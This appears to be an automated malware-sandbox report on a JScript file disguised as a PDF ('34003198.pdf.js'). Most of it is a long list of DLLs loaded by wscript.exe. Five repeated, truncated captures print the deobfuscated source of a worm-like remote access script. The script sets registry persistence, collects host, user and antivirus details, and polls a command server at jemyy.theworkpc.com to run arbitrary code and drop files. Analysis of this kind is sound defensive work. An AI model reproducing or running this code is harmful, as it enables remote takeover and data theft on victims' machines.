Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: 34003198.pdf.js

Static file information: File size 3953355 > 1048576

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) 